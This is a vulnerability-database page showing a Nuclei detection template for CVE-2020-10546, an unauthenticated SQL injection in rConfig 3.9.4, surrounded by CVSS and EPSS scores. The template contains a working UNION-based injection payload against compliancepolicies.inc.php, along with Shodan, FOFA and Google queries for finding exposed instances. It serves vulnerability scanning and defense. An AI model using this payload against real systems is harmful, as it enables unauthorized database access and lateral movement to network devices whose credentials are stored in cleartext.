Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-10546
HistoryFeb 14, 2021 - 7:30 p.m.

rConfig 3.9.4 - SQL Injection

2021-02-1419:30:22
ProjectDiscovery
github.com
7

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

0.384 Low

EPSS

Percentile

97.2%

rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes’ passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

id: CVE-2020-10546

info:
  name: rConfig 3.9.4 - SQL Injection
  author: madrobot
  severity: critical
  description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
  remediation: |
    Upgrade to the latest version of rConfig or apply the provided patch to fix the SQL Injection vulnerability.
  reference:
    - https://github.com/theguly/exploits/blob/master/CVE-2020-10546.py
    - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10546
    - https://github.com/theguly/exploits
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-10546
    cwe-id: CWE-89
    epss-score: 0.38355
    epss-percentile: 0.97221
    cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rconfig
    product: rconfig
    shodan-query: http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve2020,cve,rconfig,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "[project-discovery]"

      - type: status
        status:
          - 200
# digest: 490a0046304402204bae7c90ae5c55d92a92908965fd3bbb4e40209aeb2b826a633b569c972ddb17022004da97dd48aa1fa01baeeb1aff87b1bc8e3d853fd435679c562f94c3406bfbe7:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

0.384 Low

EPSS

Percentile

97.2%